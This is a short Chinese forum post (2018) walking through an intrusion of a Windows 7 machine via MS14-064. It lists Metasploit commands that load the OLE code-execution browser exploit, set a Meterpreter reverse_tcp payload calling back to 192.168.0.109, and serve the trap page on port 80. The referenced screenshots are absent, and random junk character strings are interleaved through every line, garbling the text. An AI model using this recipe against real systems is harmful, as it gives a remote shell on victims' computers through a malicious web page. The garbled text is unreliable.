找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1432|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

: ^5 ?3 u: p, \5 j 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示9 n6 o2 j1 e) Q

- q) s4 z# s; T* {. I+ M9 V9 {8 M

! `4 l u5 W6 P5 W& P) L 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: # P$ k, p1 n9 u3 J( C0 h

a% }) g4 A. V4 e0 Z8 e

- I& j U Z2 g( S2 h& g 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp 8 [! u- I- D9 ^! z

6 l. q r: n# N% i2 s! i

2 A: c( N, P* ?9 f- L& \' S k             set AllowPowershellPrompt true4 |& C: l% J6 i' y" n. @

! v' d3 t1 w7 O! {

& A% h" t9 ~; W8 r" T8 B             Set LHOST 192.168.0.1091 G5 W& r3 ^0 Q- V# n

0 r* h; L; B' J9 S6 X

3 w4 k8 @! l4 d+ q A$ U             set SRVHOST 192.168.0.109 6 q6 H: S: {3 S) X1 K; d4 J

- M' Z3 x# t) ^- \9 O( ~. l# n

d& _7 K( I1 J0 ^& ^* V             Set uripath share 3 i+ O2 U. f3 S

3 Y! ^% g1 S( R' V

+ h; m( ^+ j/ e1 m% f             Set srvport 80 ( f3 T5 D& N' l2 Z4 f

! j0 ^% \% i& L7 y: i- R8 O

# g* `9 h. J& ~8 |$ ?5 r5 A  / f" e( _3 L- u+ Z

. a0 ?2 F" T: d2 K" Y, z

0 z: O5 J' n0 R1 e6 a  , S! S+ U& E1 I

% v X6 q) @- g7 s

$ y, b( I8 ?* f   5 o8 n3 f. j: o4 P

p+ h7 D1 M% k5 b D$ c

" \/ i5 f; `6 `1 W5 ^  , ]+ q8 Q3 D4 a! O2 D

3 ?. g$ z$ N5 Y, ]# \% t

O3 C& i# r# ]- v( M D4 _% f   5 ~6 O$ A) s$ R, ?

! [- }( x: ]5 S( x% b Z& F

9 N1 l8 n9 i* { 下面我们来访问本地地址如图:$ ^! C3 K& C4 t0 S6 L* z1 @$ ?; A

0 T6 c2 J+ c: S1 v

6 s: _. f* |! b: v$ x M  6 {( \' q0 ^2 c3 k6 _, ^

- s# R3 v& p4 ~4 |

* f+ B( C! X: @8 r   . B: \, A3 u1 F0 F+ j& d. T5 Z! ^$ A8 n

7 h" Z8 ?! m! I+ U- m& @* M

4 [( H: K- Z8 Y # T/ P8 D6 A) a! L7 b+ o1 T; G8 A! j; K

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表